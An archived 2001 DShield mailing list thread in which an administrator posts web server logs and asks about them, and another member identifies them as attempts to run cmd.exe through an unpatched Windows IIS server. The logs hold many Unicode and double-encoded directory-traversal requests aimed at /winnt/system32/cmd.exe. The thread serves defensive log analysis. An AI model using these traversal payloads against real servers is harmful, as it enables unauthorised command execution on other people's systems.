[Dshield] win32 exploit?

Mel Chandler PMI MChandler at pmi.delta.org
Fri Aug 3 20:24:27 GMT 2001


Looks like someone is trying to execute cmd.exe to do god knows what.  Is
this a Windows 2000 server that has had that vulnerability patched already?
It looks like they're trying to exploit it unsuccessfully.

Mel L. Chandler, A+, Network+, MCNE, MCDBA, MCSE+I, CCNA
MChandler at PMI.Delta.org
Network Analyst
Information Services
PMI Delta Dental
(562) 467-6627

===================================
= not many animals were harmed in =
=    the making of this email     =
===================================


-----Original Message-----
From: Joseph Shraibman [mailto:jks at selectacast.net]
Sent: Friday, August 03, 2001 11:02 AM
To: dshield at dshield.org
Subject: [Dshield] win32 exploit?


Does anyone know what this is?

216.26.139.35 - - [03/Aug/2001:13:24:59 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 200 201 "-" "-"

[31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
bogus_host_without_reverse_dns 207.213.220.70 - - [06/Apr/2001:22:21:26
-0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 344
bogus_host_without_reverse_dns 128.121.2.139 - - [16/Jun/2001:18:14:33
-0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 -
error_log:[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70]
File does not exist:
/local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..
À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
error_log:[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File
does not exist:
/local/www/apps253/bogus_host_without_reverse_dns/scripts/..À¯..À¯..À¯..À¯..
À¯..À¯..À¯..À¯/winnt/system32/cmd.exe
error_log:[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File
does not exist:
/local/www/apps253/apps/scripts/..Á?../winnt/system32/cmd.exe
error_log:[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File
does not exist:
/local/www/apps253/apps/scripts/..%5c%5c../winnt/system32/cmd.exe
207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 332
128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 332
216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 332 "-" "-"
128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 332 "-" "-"
216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
"-" "-"
61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/w
innt/system32/cmd.exe
[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/w
innt/system32/cmd.exe
[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe
207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 328
128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 328
216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 -
61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
207.213.220.70 - - [06/Apr/2001:22:21:26 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 328 "-" "-"
128.121.2.139 - - [16/Jun/2001:18:14:33 -0400] "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi
nnt/system32/cmd.exe?/c%20dir
HTTP/1.0" 404 328 "-" "-"
216.198.90.30 - - [07/Jul/2001:23:57:50 -0400] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir" 404 - "-"
"-"
61.151.231.33 - - [31/Jul/2001:21:45:41 -0400] "GET
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 -
"-" "-"
[Fri Apr  6 22:21:26 2001] [error] [client 207.213.220.70] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/w
innt/system32/cmd.exe
[Sat Jun 16 18:14:33 2001] [error] [client 128.121.2.139] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯/w
innt/system32/cmd.exe
[Sat Jul  7 23:57:50 2001] [error] [client 216.198.90.30] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..Á?../winnt/system32/cmd.exe
[Tue Jul 31 21:45:41 2001] [error] [client 61.151.231.33] File does not
exist:
/local/www/virtual/www.xtenit.com/scripts/..%5c%5c../winnt/system32/cmd.exe


-- 
Joseph Shraibman
jks at selectacast.net
Increase signal to noise ratio.  http://www.targabot.com

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www1.dshield.org/mailman/listinfo/dshield
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://www.dshield.org/pipermail/list/attachments/20010803/14edeaff/attachment.htm


More information about the list mailing list